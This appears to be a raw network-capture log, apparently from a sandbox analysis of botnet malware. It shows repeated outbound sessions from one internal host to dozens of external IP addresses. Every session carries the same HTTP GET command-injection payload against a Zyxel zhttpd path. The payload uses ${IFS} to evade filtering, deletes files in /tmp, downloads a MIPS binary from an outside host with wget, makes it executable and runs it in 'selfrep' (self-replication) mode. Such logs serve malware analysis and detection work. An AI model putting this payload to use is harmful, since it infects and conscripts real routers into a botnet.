                                      Jan 14, 2024 15:50:55.503096104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6598192.168.2.1452606218.122.89.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503142118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6599192.168.2.1452370128.109.157.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503176928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6600192.168.2.1451772126.49.170.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503204107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6601192.168.2.1454164113.153.218.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503252029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6602192.168.2.143709492.173.210.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503293037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6603192.168.2.1444522100.210.210.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503335953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6604192.168.2.144605636.57.106.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503365040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6605192.168.2.14502981.38.12.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503449917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6606192.168.2.1447296194.184.247.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503480911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6607192.168.2.1438512187.149.63.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503524065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6608192.168.2.143821082.11.138.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503555059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6609192.168.2.145144049.104.46.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503590107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6610192.168.2.1454658142.123.143.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503614902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6611192.168.2.1459248145.85.135.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503668070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6612192.168.2.1460250123.142.181.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503698111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6613192.168.2.144825689.169.107.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503753901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6614192.168.2.1448830151.51.154.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503784895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6615192.168.2.1451344211.235.102.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503819942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6616192.168.2.145417489.225.30.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503889084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6617192.168.2.145611883.132.238.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503935099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6618192.168.2.1448530106.248.241.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503963947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6619192.168.2.1460358166.95.239.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.503983974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6620192.168.2.145660847.242.247.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504023075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6621192.168.2.1460468150.111.90.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504071951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6622192.168.2.1446798192.101.144.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504122019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6623192.168.2.1442292119.91.216.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504158020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6624192.168.2.1432824125.152.189.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504189014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6625192.168.2.145127024.215.29.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504245996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6626192.168.2.1440794192.196.253.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504296064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6627192.168.2.1440718114.156.128.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504312992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6628192.168.2.1456604193.24.83.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504349947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6629192.168.2.1433418131.157.175.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504403114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6630192.168.2.144924073.76.203.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504455090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6631192.168.2.145164871.30.77.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504493952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6632192.168.2.1458610194.242.254.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504538059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6633192.168.2.145133457.190.35.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504565954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6634192.168.2.145365449.106.62.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504590034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6635192.168.2.1457778219.163.157.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504631042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6636192.168.2.1438292189.147.97.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504668951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6637192.168.2.145484094.153.164.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504703045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6638192.168.2.1444020176.132.46.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504766941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6639192.168.2.1452818116.219.133.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504796982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6640192.168.2.145545223.187.123.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504828930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6641192.168.2.145714853.23.58.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504877090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6642192.168.2.1455032164.114.173.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504906893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6643192.168.2.1448396203.251.122.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504919052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6644192.168.2.1450182203.55.56.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.504945993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6645192.168.2.1441518191.230.240.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505012989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6646192.168.2.1441202152.146.154.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505034924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6647192.168.2.1441592125.135.195.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505084991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6648192.168.2.1449106201.222.173.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505115032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6649192.168.2.144882646.11.157.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505172968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6650192.168.2.1436592223.74.34.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505209923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6651192.168.2.1459606117.236.165.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505264997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6652192.168.2.1455406114.231.142.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505301952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6653192.168.2.1447802154.20.236.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505345106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6654192.168.2.145084832.211.100.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505378962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6655192.168.2.145310069.229.110.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505425930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6656192.168.2.1455080193.240.43.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505460978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6657192.168.2.1442096184.169.6.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505518913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6658192.168.2.1437728205.69.33.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505585909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6659192.168.2.1447444177.85.11.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505594969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6660192.168.2.1441102221.177.49.81443
                                      TimestampBytes transferredDirectionData
